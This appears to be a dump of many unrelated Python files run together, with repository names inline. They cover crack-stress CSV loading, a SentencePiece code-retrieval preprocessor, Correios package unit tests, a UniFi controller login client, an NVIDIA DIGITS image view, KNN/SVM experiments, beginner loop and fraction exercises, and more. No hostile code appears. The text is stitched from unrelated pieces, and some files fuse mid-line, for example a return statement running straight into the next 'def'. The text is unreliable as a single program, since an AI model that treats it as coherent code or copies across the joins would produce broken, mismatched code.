range(np.count_nonzero(x <= a)): # cpwriter.writerow([ x[poscnt], sigma_closure[poscnt]]) # pass # pass # else: # for poscnt in range(np.count_nonzero(x <= a)): # cpwriter.writerow([ x[poscnt], sigma_closure[poscnt], crackopening[poscnt]]) # pass # pass # pass pass def load_closurestress(filename): """ returns (x,x_bnd,xstep,a,sigma_closure,crack_opening)... crack_opening returned (if present) is half_crackopening""" import pandas as pd closurestress_dataframe = pd.read_csv(filename,index_col=0) # determine crack length a from index title if possible if closurestress_dataframe.index.name=="Crack radius (m)": a = None # Not encoded else: matchobj = re.match(r"""Crack radius \(m\) compared to crack \(half\) length a=([-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?) m""",closurestress_dataframe.index.name) if matchobj is None: raise ValueError("Failed to parse crack length from index title \"%s\"" % (closurestress_dataframe.index.name)) a = float(matchobj.group(1)) pass x = np.array(closurestress_dataframe.index) xstep = x[1]-x[0] if a is None: # Old version of save_closurestress that # didn't include crack length in header didn't go # at all beyond crack length... 
but we need # at least one sample beyond x = np.concatenate((x,(x[-1]+xstep,))) pass x_bnd = np.concatenate(((x[0]-xstep/2.0,),x+xstep/2.0)) if x_bnd[0] < 0.0: x_bnd[0]=0.0 pass sigma_closure = np.array(closurestress_dataframe["Closure stress (Pa)"]) if a is None: # expand out sigma_closure by one sample sigma_closure = np.concatenate((sigma_closure,(0.0,))) pass if "Crack opening (m)" in closurestress_dataframe.keys(): crack_opening = np.array(closurestress_dataframe["Crack opening (m)"]) if a is None: # expand out crack_opening by one sample crack_opening = np.concatenate((crack_opening,(0.0,))) pass pass else: crack_opening = None pass return (x,x_bnd,xstep,a,sigma_closure,crack_opening) hdrake/process-ipcc import numpy as np class far_variable(): pass class cipher: def __init__(self,name): self.name = name self.var_list = None def get_byte_index(self,idx): baseline_idx = self.bytes_per_data_entry byte_idx = self.nbytes_header_cw + self.nbytes_header + self.nbytes_data_cw for (ndim, dim_idx) in zip(self.dims, list(range(len(self.dims)))): byte_idx += baseline_idx * idx[dim_idx] baseline_idx *= self.dims[dim_idx] if dim_idx == self.data_cw_dim: baseline_idx += self.nbytes_data_cw return byte_idxdef generate_rf_page_object(): path = "" page_structure_csv = "" rf_keywords = "" default_action = ["Wait Until Element Is Visible", "Wait Until Element Is Enabled"]import unittest from coverage import Coverage import sys import os import test if __name__ == '__main__': # the directory change is done to ease the use of relative # paths in the unit tests os.chdir("./tests") sys.path.append(os.getcwd()) suite = unittest.TestSuite() cov = Coverage() cov.start() for test in unittest.TestLoader().discover("test"): suite.addTest(test) unittest.TextTestRunner(verbosity=2).run(suite) cov.stop() cov.save() cov.report(show_missing=True, omit=['test_*.py', '*/__init__.py']) rizwan09/REDCODER10-100 #!/usr/bin/env python # Copyright (c) Facebook, Inc. and its affiliates. # All rights reserved. # # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. 
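# Summary of this preprocessing script (based on the code below): it loads a JSON file of
# examples, each with a source field, a target field and retrieved contexts under 'ctxs';
# optionally appends the top-k retrieved snippets to the source, separated by '_NL_SEP_';
# encodes source and target with a SentencePiece model in a multiprocessing pool; and
# writes the results to '<pref>.spm.<src_lang>' and '<pref>.spm.<tgt_lang>' in the output
# directory.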
import argparse import json import os from tqdm import tqdm from multiprocessing import Pool import sentencepiece as spm from python_tokenizer import python_code_tokenize class MultiprocessingEncoder(object): def __init__(self, args): self.keep_empty = args.keep_empty self.max_src_len = args.max_src_len self.max_tgt_len = args.max_tgt_len self.sp = spm.SentencePieceProcessor(model_file=args.model_file) def initializer(self): pass def _encode(self, line): return self.sp.encode(line, out_type=str) def _decode(self, tokens): return self.sp.decode(tokens) def encode(self, example): assert isinstance(example, dict) assert 'src' in example and 'tgt' in example if len(example['src']) == 0 and not self.keep_empty: return None if len(example['tgt']) == 0 and not self.keep_empty: return None src_tokens = self._encode(example['src'])[:self.max_src_len] tgt_tokens = self._encode(example['tgt'])[:self.max_tgt_len] return {'src': " ".join(src_tokens), 'tgt': " ".join(tgt_tokens)} def load_data(input_file, src_field, tgt_field, src_lang, top_k, WITH_WITHOUT_SUFFIX): data = [] with open(input_file) as f: retrieved_code = json.load(f) for idx, ex in enumerate(tqdm(retrieved_code, total=len(retrieved_code))): try: src = ex[src_field] except: ex=retrieved_code[ex] assert src_field in ex and tgt_field in ex src = ex[src_field] src = src.replace('\n', ' ').strip() tgt = ex[tgt_field] if isinstance(tgt, list): tgt = " ".join(tgt) tgt = tgt.replace('\n', ' ').strip() if top_k > 0: inserted = 0 for rank, ctx in enumerate(ex['ctxs']): if WITH_WITHOUT_SUFFIX=="with": src += ' _NL_SEP_ ' + ctx["text"].split('_NL_')[0].strip() inserted += 1 if inserted >= top_k: break else: if tgt.strip()!= ctx["text"].split('_NL_')[0].strip(): #for retrieving without ref code but includes other codes in the test corpus src += ' _NL_SEP_ ' + ctx["text"].split('_NL_')[0].strip() inserted += 1 if inserted >= top_k: break src = src.replace('\n', ' ').strip() data.append({'src': src, 'tgt': tgt}) return data def process(args): dataset = load_data(args.input_file, args.src_field, args.tgt_field, args.src_lang, top_k=args.top_k, WITH_WITHOUT_SUFFIX=args.WITH_WITHOUT_SUFFIX) encoder = MultiprocessingEncoder(args) pool = Pool(args.workers, initializer=encoder.initializer) processed_dataset = [] with tqdm(total=len(dataset), desc='Processing') as pbar: for i, ex in enumerate(pool.imap(encoder.encode, dataset, 100)): pbar.update() processed_dataset.append(ex) out_src = os.path.join(args.output_dir, '{}.spm.{}'.format(args.pref, args.src_lang)) out_tgt = os.path.join(args.output_dir, '{}.spm.{}'.format(args.pref, args.tgt_lang)) with open(out_src, 'w', encoding='utf-8') as src_writer, \ open(out_tgt, 'w', encoding='utf-8') as tgt_writer: for ex in processed_dataset: if ex is not None: src_writer.write(ex['src'] + '\n') tgt_writer.write(ex['tgt'] + '\n') def main(): parser = argparse.ArgumentParser() parser.add_argument( "--model-file", help='path to *.model file', ) parser.add_argument( "--input_file", type=str, default=['-'], help="input files (.jsonl) to filter/encode", ) parser.add_argument( "--output_dir", type=str, default=['_'], help="path of the output directory", ) parser.add_argument( "--src_field", type=str, default=['_'], help="field name to be considered as the source", ) parser.add_argument( "--tgt_field", type=str, default=['_'], help="field name to be considered as the source", ) parser.add_argument( "--src_lang", type=str, default=['_'], help="name of the source language", ) parser.add_argument( "--tgt_lang", type=str, 
default=['_'], help="name of the target language", ) parser.add_argument( "--pref", type=str, default=['_'], help="file prefix", ) parser.add_argument( "--keep-empty", action="store_true", help="keep empty lines", ) parser.add_argument("--max_src_len", type=int, default=512) parser.add_argument("--max_tgt_len", type=int, default=512) parser.add_argument("--workers", type=int, default=60) parser.add_argument("--WITH_WITHOUT_SUFFIX", type=str, default="with") parser.add_argument("--top_k", type=int, default=5) args = parser.parse_args() process(args) if __name__ == "__main__": main() import sys from gmm import save_model, predict from seg import vadSeg, segment if __name__ == '__main__': if len(sys.argv) == 1: print('help: python main.py [task] [model|wav]') exit() task = sys.argv[1] if task == 'train': speech = sys.argv[2] save_model(speech.replace('.wav', '.mdl'), speech) print('done.') elif task == 'seg': model = sys.argv[2] dialogue = sys.argv[3] vadSeg(model, dialogue) print('done.') elif task == 'verify': model = sys.argv[2] speech = sys.argv[3] score = predict(model, speech) print('yes') if score < 50 else print('no') # Instructions: # Just run the file and answer the questions! # -------------------------------------------------------------------- while True: first_fraction_str = input("What is the first fraction? Please separate the two numbers by a comma!\n") print("") second_fraction_str = input("What is the second fraction? Please separate the two numbers by a comma\n") first_fraction_str = first_fraction_str.split(",") second_fraction_str = second_fraction_str.split(",") first_fraction = [] second_fraction = [] for number in first_fraction_str: new_number = int(number) first_fraction.append(new_number) for number in second_fraction_str: new_number = int(number) second_fraction.append(new_number) fraction1_simplest = (first_fraction[0] / first_fraction[0]) / (first_fraction[1] / first_fraction[0]) fraction2_simplest = (second_fraction[0] / second_fraction[0]) / (second_fraction[1] / second_fraction[0]) if fraction1_simplest == fraction2_simplest: print("") print("The two ratios form a proportion!") print("Ratio one's simplest form:", fraction1_simplest) print("Ratio two's simplest form:", fraction2_simplest) print("") continue_question = input("Would you like to do another calculation?\n") if "y" in continue_question.lower(): for i in range(15): print("") continue else: break elif fraction1_simplest != fraction2_simplest: print("") print("The two ratios don't form a proportion!") print("Ratio one's simplest form:", fraction1_simplest) print("Ratio two's simplest form:", fraction2_simplest) print("") continue_question = input("Would you like to do another calculation?\n") if "y" in continue_question.lower(): for i in range(15): print("") continue else: break else: print("") print("Please put in a valid data type") for i in range(15): print("") continue ptyadana/python-dojo1-10 # Question: Please create a script that generates 26 text files named a.txt, b.txt, # and so on up to z.txt. Each file should contain a letter reflecting its filename. # So, a.txt will contain letter a, b.txt will contain letter b and so on. # Answer: import string def create_file_by_letter(letter): with open('./output_45/'+letter+'.txt','w') as file: file.write(letter) def files_for_each_alphabets(): for letter in string.ascii_lowercase: create_file_by_letter(letter) if __name__ == "__main__": files_for_each_alphabets() Micha546/TasKing0 from django.urls import path from . 
import views urlpatterns = [ path('my-groups', views.my_groups, name='mygroups'), path('group//', views.view_group, name='groups'), path('assign//', views.assign, name='assign'), path('approve//', views.approve, name='approve'), path('delete//', views.delete_group, name='delete_group'), ] 1-10 __version__ = '1.10.2' devsdmf/correios-python-sdk # -*- coding: utf-8 -*- import unittest from correios.package import Package, BoxPackage, CylinderPackage, EnvelopePackage class TestPackage(unittest.TestCase): def setUp(self): pass def test_create_package(self): package = Package() self.assertEqual(Package.FORMAT_BOX,package.get_format()) def test_create_package_with_different_format(self): package = Package(Package.FORMAT_CYLINDER) self.assertEqual(Package.FORMAT_CYLINDER,package.get_format()) def test_package_is_format(self): package = Package(Package.FORMAT_CYLINDER) self.assertTrue(package.is_format(Package.FORMAT_CYLINDER)) def test_abstract_add_item_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.add_item() def test_check_for_items_in_emtpy_package(self): package = Package() self.assertFalse(package.has_items()) def test_check_for_items_in_non_empty_package(self): package = Package() package.items = [1] self.assertTrue(package.has_items()) def test_get_items_from_empty_package(self): package = Package() items = package.get_items() self.assertEqual(0,len(items)) def test_get_items_from_non_empty_package(self): package = Package() package.items = [1] items = package.get_items() self.assertGreater(len(items),0) def test_abstract_get_dimensions_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.get_dimensions() def test_get_weight_from_empty_package(self): package = Package() self.assertEqual(Package.MIN_WEIGHT,package.get_weight()) def test_abstract_is_valid_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.is_valid() def test_abstract_api_format_raises_exception(self): package = Package() with self.assertRaises(NotImplementedError): package.api_format() class TestBoxPackage(unittest.TestCase): def setUp(self): pass def test_create_box_package(self): package = BoxPackage() self.assertEqual(Package.FORMAT_BOX,package.get_format()) def test_add_single_item_to_box_package(self): height = 1.0 width = 2.0 depth = 3.0 weight = 0.3 package = BoxPackage() package.add_item(height,width,depth,weight) self.assertTrue(package.has_items()) self.assertEqual(height,package.get_items()[0].height) self.assertEqual(width,package.get_items()[0].width) self.assertEqual(depth,package.get_items()[0].depth) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_box_package(self): height0 = 1.0 width0 = 2.0 depth0 = 3.0 weight0 = 0.3 height1 = 2.0 width1 = 3.0 depth1 = 4.0 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) self.assertTrue(package.has_items()) self.assertEqual(height0,package.get_items()[0].height) self.assertEqual(width0,package.get_items()[0].width) self.assertEqual(depth0,package.get_items()[0].depth) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(height1,package.get_items()[1].height) self.assertEqual(width1,package.get_items()[1].width) self.assertEqual(depth1,package.get_items()[1].depth) self.assertEqual(weight1,package.get_items()[1].weight) def 
test_get_dimensions_for_single_item_box_package_with_minimum_dimensions(self): height = 1.0 width = 2.0 depth = 3.0 package = BoxPackage() package.add_item(height,width,depth,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(BoxPackage.MIN_HEIGHT,BoxPackage.MIN_WIDTH,BoxPackage.MIN_DEPTH)) def test_get_dimensions_for_single_item_box_package_with_dimensions_over_the_minimum(self): height = 15.0 width = 20.0 depth = 25.0 package = BoxPackage() package.add_item(height,width,depth,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(height,width,depth)) def test_get_dimensions_for_multiple_items_box_package_with_minimum_dimensions(self): height0 = 0.5 width0 = 0.5 depth0 = 0.5 weight0 = 0.3 height1 = 0.5 width1 = 0.8 depth1 = 0.6 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(BoxPackage.MIN_HEIGHT,BoxPackage.MIN_WIDTH,BoxPackage.MIN_DEPTH)) def test_get_dimensions_for_multiple_items_box_package_with_dimensions_over_the_minimum(self): height0 = 10 width0 = 12 depth0 = 25 weight0 = 0.3 height1 = 6 width1 = 14 depth1 = 20 weight1 = 1.0 package = BoxPackage() package.add_item(height0,width0,depth0,weight0) package.add_item(height1,width1,depth1,weight1) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(height0 + height1,width1,depth0)) def test_get_weight_of_box_package(self): weight0 = 0.5 weight1 = 1.5 package = BoxPackage() package.add_item(1.0,2.0,3.0,weight0) package.add_item(2.0,3.0,5.0,weight1) self.assertEqual(weight0 + weight1,package.get_weight()) def test_check_for_valid_box_package_with_valid_dimensions(self): package = BoxPackage() package.add_item(15.0,20.0,35.0,1.2) self.assertTrue(package.is_valid()) def test_check_for_valid_box_package_with_exceeded_dimensions(self): package = BoxPackage() package.add_item(BoxPackage.MAX_HEIGHT+1.0,BoxPackage.MAX_WIDTH+1.0,BoxPackage.MAX_DEPTH+1.0,2.0) self.assertFalse(package.is_valid()) def test_check_for_valid_box_package_with_exceeded_volume(self): package = BoxPackage() package.add_item(100.0,100.0,100.0,5.0) self.assertFalse(package.is_valid()) def test_api_format_for_valid_box_package(self): height = 15.0 width = 20.0 depth = 35.0 weight = 1.2 package = BoxPackage() package.add_item(height,width,depth,weight) expected = { 'nCdFormato': Package.FORMAT_BOX, 'nVlAltura': height, 'nVlLargura': width, 'nVlComprimento': depth, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_box_package(self): package = BoxPackage() package.add_item(100.0,100.0,100.0,5.0) with self.assertRaises(Exception): package.api_format() class TestCylinderPackage(unittest.TestCase): def setUp(self): pass def test_create_cylinder_package(self): package = CylinderPackage() self.assertEqual(Package.FORMAT_CYLINDER,package.get_format()) def test_add_single_item_to_cylinder_package(self): length = 5.0 diameter = 1.0 weight = 0.5 package = CylinderPackage() package.add_item(length,diameter,weight) self.assertTrue(package.has_items()) self.assertEqual(length,package.get_items()[0].length) self.assertEqual(diameter,package.get_items()[0].diameter) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_cylinder_package(self): length0 = 5.0 diameter0 = 1.0 weight0 = 0.3 length1 = 10.0 diameter1 = 2.0 weight1 = 0.5 package = CylinderPackage() 
package.add_item(length0,diameter0,weight0) package.add_item(length1,diameter1,weight1) self.assertTrue(package.has_items()) self.assertEqual(length0,package.get_items()[0].length) self.assertEqual(diameter0,package.get_items()[0].diameter) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(length1,package.get_items()[1].length) self.assertEqual(diameter1,package.get_items()[1].diameter) self.assertEqual(weight1,package.get_items()[1].weight) def test_get_dimensions_for_single_item_cylinder_package_with_minimum_dimensions(self): length = 5.0 diameter = 1.0 package = CylinderPackage() package.add_item(length,diameter,0.5) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(CylinderPackage.MIN_LENGTH,CylinderPackage.MIN_DIAMETER)) def test_get_dimensions_for_single_item_cylinder_package_with_dimensions_over_the_minimum(self): length = 60.0 diameter = 10.0 package = CylinderPackage() package.add_item(length,diameter,2.0) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(length,diameter)) def test_get_dimensions_for_multiple_items_cylinder_package_with_minimum_dimensions(self): length0 = 5.0 diameter0 = 1.0 length1 = 10.0 diameter1 = 2.0 package = CylinderPackage() package.add_item(length0,diameter0,0.5) package.add_item(length1,diameter1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(CylinderPackage.MIN_LENGTH,CylinderPackage.MIN_DIAMETER)) def test_get_dimensions_for_multiple_items_cylinder_package_with_dimensions_over_the_minimum(self): length0 = 25.0 diameter0 = 5.0 length1 = 30.0 diameter1 = 12.0 package = CylinderPackage() package.add_item(length0,diameter0,0.5) package.add_item(length1,diameter1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(length0 + length1,diameter1)) def test_get_weight_of_cylinder_package(self): weight0 = 5.0 weight1 = 12.5 package = CylinderPackage() package.add_item(1.0,2.0,weight0) package.add_item(2.0,3.0,weight1) self.assertEqual(package.get_weight(),weight0 + weight1) def test_check_for_valid_cylinder_package_with_valid_dimensions(self): package = CylinderPackage() package.add_item(40.0,10.0,0.5) self.assertTrue(package.is_valid()) def test_check_for_valid_cylinder_package_with_exceeded_dimensions(self): package = CylinderPackage() package.add_item(150.0,2.0,0.5) self.assertFalse(package.is_valid()) def test_check_for_valid_cylinder_package_with_exceeded_volume(self): package = CylinderPackage() package.add_item(102.0,50.0,1.0) self.assertFalse(package.is_valid()) def test_api_format_for_valid_cylinder_package(self): length = 40.0 diameter = 10.0 weight = 1.0 package = CylinderPackage() package.add_item(length,diameter,weight) expected = { 'nCdFormato': Package.FORMAT_CYLINDER, 'nVlComprimento': length, 'nVlDiametro': diameter, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_cylinder_package(self): package = CylinderPackage() package.add_item(102.5,50.0,5.0) with self.assertRaises(Exception): package.api_format() class TestEnvelopePackage(unittest.TestCase): def setUp(self): pass def test_create_envelope_package(self): package = EnvelopePackage() self.assertEqual(Package.FORMAT_ENVELOPE,package.get_format()) def test_add_single_item_to_envelope_package(self): width = 11.0 length = 20.0 weight = 0.3 package = EnvelopePackage() package.add_item(width,length,weight) self.assertTrue(package.has_items()) self.assertEqual(width,package.get_items()[0].width) 
self.assertEqual(length,package.get_items()[0].length) self.assertEqual(weight,package.get_items()[0].weight) def test_add_multiple_items_to_envelope_package(self): width0 = 11.0 length0 = 20.0 weight0 = 0.3 width1 = 15.0 length1 = 25.0 weight1 = 0.5 package = EnvelopePackage() package.add_item(width0,length0,weight0) package.add_item(width1,length1,weight1) self.assertTrue(package.has_items()) self.assertEqual(width0,package.get_items()[0].width) self.assertEqual(length0,package.get_items()[0].length) self.assertEqual(weight0,package.get_items()[0].weight) self.assertEqual(width1,package.get_items()[1].width) self.assertEqual(length1,package.get_items()[1].length) self.assertEqual(weight1,package.get_items()[1].weight) def test_get_dimensions_for_single_item_envelope_package_with_minimum_dimensions(self): width = 5.0 length = 10.0 package = EnvelopePackage() package.add_item(width,length,0.3) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(EnvelopePackage.MIN_WIDTH,EnvelopePackage.MIN_LENGTH)) def test_get_dimensions_for_single_item_envelope_package_with_dimensions_over_the_minimum(self): width = 25.0 length = 40.0 package = EnvelopePackage() package.add_item(width,length,0.5) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(width,length)) def test_get_dimensions_for_multiple_items_envelope_package_with_minimum_dimensions(self): width0 = 5.0 length0 = 5.0 width1 = 10.0 length1 = 10.0 package = EnvelopePackage() package.add_item(width0,length0,0.5) package.add_item(width1,length1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(EnvelopePackage.MIN_WIDTH,EnvelopePackage.MIN_LENGTH)) def test_get_dimensions_for_multiple_items_envelope_package_with_dimensions_over_the_minimum(self): width0 = 20.0 length0 = 10.0 width1 = 10.0 length1 = 25.0 package = EnvelopePackage() package.add_item(width0,length0,0.5) package.add_item(width1,length1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(width0,length1)) def test_get_weight_of_envelope_package(self): weight0 = 4.0 weight1 = 9.0 package = EnvelopePackage() package.add_item(5.0,5.0,weight0) package.add_item(15.0,10.0,weight1) self.assertEqual(package.get_weight(),weight0 + weight1) def test_check_for_valid_envelope_package_with_valid_dimensions(self): package = EnvelopePackage() package.add_item(13.0,25.0,0.5) self.assertTrue(package.is_valid()) def test_check_for_valid_envelope_package_with_exceeded_dimensions(self): package = EnvelopePackage() package.add_item(65.0,70.0,0.5) self.assertFalse(package.is_valid()) def test_check_for_valid_envelope_package_with_exceeded_weight(self): package = EnvelopePackage() package.add_item(13.0,25.0,1.2) self.assertFalse(package.is_valid()) def test_api_format_for_valid_envelope_package(self): width = 13.0 length = 25.0 weight = 0.5 package = EnvelopePackage() package.add_item(width,length,weight) expected = { 'nCdFormato': Package.FORMAT_ENVELOPE, 'nVlAltura': 0.0, 'nVlLargura': width, 'nVlComprimento': length, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_envelope_package(self): package = EnvelopePackage() package.add_item(65.0,70.0,0.5) with self.assertRaises(Exception): package.api_format() knuu/competitive-programming R, G, B, N = map(int, input().split()) ans = 0 for r in range(N + 1): for g in range(N + 1): res = N - r * R - g * G if res >= 0 and res % B == 0: ans += 1 print(ans) ojmakhura/DIGITSdigits/extensions/view/imageOutput/view.py # 
Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved. import os import PIL.Image import PIL.ImageDraw import digits from digits.utils import subclass, override from .forms import ConfigForm from ..interface import VisualizationInterface CONFIG_TEMPLATE = "config_template.html" VIEW_TEMPLATE = "view_template.html" @subclass class Visualization(VisualizationInterface): """ A visualization extension to display the network output as an image """ def __init__(self, dataset, **kwargs): # memorize view template for later use extension_dir = os.path.dirname(os.path.abspath(__file__)) self.view_template = open( os.path.join(extension_dir, VIEW_TEMPLATE), "r").read() # view options self.channel_order = kwargs['channel_order'].upper() self.data_order = kwargs['data_order'].upper() self.normalize = (kwargs['pixel_conversion'] == 'normalize') self.show_input = (kwargs['show_input'] == 'yes') @staticmethod def get_config_form(): return ConfigForm() @staticmethod def get_config_template(form): """ parameters: - form: form returned by get_config_form(). This may be populated with values if the job was cloned returns: - (template, context) tuple - template is a Jinja template to use for rendering config options - context is a dictionary of context variables to use for rendering the form """ extension_dir = os.path.dirname(os.path.abspath(__file__)) template = open( os.path.join(extension_dir, CONFIG_TEMPLATE), "r").read() return (template, {'form': form}) @staticmethod def get_id(): return 'image-image-output' @staticmethod def get_title(): return 'Image output' @override def get_view_template(self, data): """ returns: - (template, context) tuple - template is a Jinja template to use for rendering config options - context is a dictionary of context variables to use for rendering the form """ return self.view_template, {'image_input': digits.utils.image.embed_image_html(data[0]), 'image_output': digits.utils.image.embed_image_html(data[1])} @override def process_data(self, input_id, input_data, output_data): """ Process one inference and return data to visualize """ if self.show_input: data_input = input_data.astype('float32') image_input = self.process_image(self.data_order, data_input) else: image_input = None data_output = output_data[list(output_data.keys())[0]].astype('float32') image_output = self.process_image(self.data_order, data_output) return [image_input, image_output] def process_image(self, data_order, data): if data_order == 'HWC': data = (data.transpose((2, 0, 1))) # assume CHW at this point channels = data.shape[0] if channels == 3 and self.channel_order == 'BGR': data = data[[2, 1, 0], ...] # BGR to RGB # convert to HWC data = data.transpose((1, 2, 0)) # assume 8-bit if self.normalize: data -= data.min() if data.max() > 0: data /= data.max() data *= 255 else: # clip data = data.clip(0, 255) # convert to uint8 data = data.astype('uint8') # convert to PIL image if channels == 1: # drop channel axis image = PIL.Image.fromarray(data[:, :, 0]) elif channels == 3: image = PIL.Image.fromarray(data) else: raise ValueError("Unhandled number of channels: %d" % channels) return image YuriyAksenov/Knn-and-Svm-classifier0 from DataAnalyzer import DataAnalyzer from Data import Data from SvmClassifier import * import numpy as np import random from Metrics import * from KnnClassifier import * from SvmClassifier import * # можно увеличить простарнства в knn путем применения лангранжа. А потом при предикте брать те веса, которые посчитали для лангранжа, точку проецировать. 
И брать соседей fileName = 'Chips.txt' data = Data.read_points_from_file(fileName) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) # Data.show_data(data) fknn, knnPredict = DataAnalyzer.analyze_knn_one(data, numFolds = 10) fsvm, svmPredict = DataAnalyzer.analyze_svm_one(data, numFolds =10) print("fscores --------------- ") print(fknn) print(fsvm) test = Metrics.t_test_empirical(fknn, fsvm) print("TEST --------------- ") print(test) print("p value --------------- ") p = Metrics.p_value(knnPredict, svmPredict, 2) print(p) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # x = np.array([[item.x, item.y] for item in data]) # y = np.array([-1 if item.label == 0 else 1 for item in data]) # x_train = x[:100] # y_train = y[:100] # x_test = x[100:] # y_test = y[100:] # svm = SvmClassifier(C=1, kernel=polynomial_kernel) # svm.fit(x_train,y_train) # res = svm.predict(x_test) # res = np.array([0 if item == -1 else 1 for item in res]) # y_test = np.array([0 if item == -1 else 1 for item in y_test]) # print(res) # f = Metrics.f_score(y_test, res); # print('-------------------------------') # print(f) svm_print = """ SVM --------------------------------------------------------- Max f_score general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| Max p value general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| Max t Wilcoxon general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| SVM --------------------------------------------------------- """ knn_print = """ KNN --------------------------------------------------------- Max f_score general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | Max p value general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | Max t Wilcoxon general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | KNN --------------------------------------------------------- """ weird_algorithm.py0 # this is my solution for weird algorithm question of CSES problem set n = int(input()) while n!=1: print(n,end=" ") if n%2 == 0: n = int(n/2) else: n = int(3*n+1) print('1')from unifi.lowlevel import LowLevelApi from unifi.mixins import * class UnifiController(LowLevelApi, NetworkApiMixin): def __init__(self, base_url): super(UnifiController, self).__init__(base_url) self.__is_unifi_os = self.__identify_unifi_os() def __identify_unifi_os(self): r = self._request('/api/system', anonymous=True, throw_unless=[]) return r.status_code == 200 def login(self, username, password): r = self._request('/api/auth/login' if self.__is_unifi_os else '/api/login', anonymous=True, json={'username': username, 'password': password}, #, 'strict': True, 'remember': False}, throw_unless=[]) self._logged_in = r.status_code == 200 return self._logged_in def logout(self): r = self._request('/api/auth/logout' if self.__is_unifi_os else '/api/logout', json={}, throw_unless=[]) if r.status_code == 200: self._logged_in = False return True return False @property def is_unifi_os(self): return self.__is_unifi_os def user(self, user='self', site='default'): r = self._request('/api/users/{user}' if self.__is_unifi_os else '/api/s/{site}/{user}', path_params={'user': user, 'site': site}) return r.json() 1-10 # Autho : # Ref : freeCodeCamp.org ( youtube ) def 
for_string():
    "loop over a string"
    for letter in "":
        print(letter)


def for_list():
    "loop over a list"
    friends = ["Jim", "Karen", "Kevin"]
    for friend in friends:
        print(friend)


def for_list_range():
    "loop over a list using the range and len functions"
    friends = ["Jim", "Karen", "Kevin"]
    # a list can be accessed by index, starting from 0
    # this does not display the strings inside the list yet, it only takes the indices
    for index in range(len(friends)):
        # the range function walks over all of the data in the list,
        # starting from 0 up to the N-th entry
        # if you print(index), only the index itself is shown
        print(friends[index])
        # use the list-typed variable to display the data inside it (e.g. the name),
        # followed by the index, so the inner loop runs once per entry in the list


def for_itterarion():
    "iteration inside a for loop"
    for index in range(5):
        if index == 0:
            print("first iteration")
        elif index == 1:
            print("second iteration")
        else:
            print("not first and second")


def for_list_dimension():
    # reading rows and columns, a representation of the list data type
    number_grid = [
        [1, 2, 3],  # row 1
        [4, 5, 6],  # row 2
        [7, 8, 9],  # row 3
        [0]         # row 4
    ]
    # print(number_grid[0][0])  # take the first row, first column
    for row in number_grid:
        # take all rows and columns / still printed list by list, i.e. row by row
        print(row)
    for row in number_grid:
        for col in row:
            print(col)  # take every row and display its entries one by one


if __name__ == "__main__":
    # for_string()
    # for_list()
    # for_list_range()
    # for_itterarion()
    for_list_dimension()
# -*- coding: utf-8 -*-
#this document is used to obtain the absolute and relative error of each key performance
#indicator corresponding to a specific od, and get some key performance indicators of the
#whole model
import pandas as pd
import math

filename_base_route = 'D:\\document\\matching probability\\data\\version2\\route\\'
filename_base_route_error = 'D:\\document\\matching probability\\data\\version2\\route_error\\'
filename_base_result = 'D:\\document\\matching probability\\data\\version2\\result\\'

column_names = ['seeker_probability', 'taker_waiting_probability', 'taker_traveling_probability', 'whole_matching_probability', 'traveling_distance', 'shared_distance', 'save_distance']
name_prefixes = ['theory_', 'simulation_']
error_prefixes = ['absolute_', 'relative_']

#obtain absolute and relative error for each od
def get_absolute_and_relative_error_for_each_od(od_index):
    filename = filename_base_route + str(od_index) + '.csv'
    df_od = pd.read_csv(filename, sep = ',')
    for column_name in column_names:
        df_od['temp'] = df_od['theory_' + column_name] - df_od['simulation_' + column_name]
        df_od['absolute_' + column_name] = df_od['temp'].map(lambda x : abs(x))
        df_od['relative_' + column_name] = df_od['absolute_' + column_name]/df_od['simulation_' + column_name]
        df_od['relative_' + column_name] = df_od['relative_' + column_name].map(lambda x : 0 if x > 10000 else x)
    filename_error = filename_base_route_error + str(od_index) + '.csv'
    df_od.to_csv(filename_error, sep = ',', index = False)
    return df_od

#obtain the key performance indicators for each od
def get_key_performance_indicators_for_each_od(df, od_index):
    column_names_method = ['whole_matching_probability', 'shared_distance', 'save_distance', 'traveling_distance']
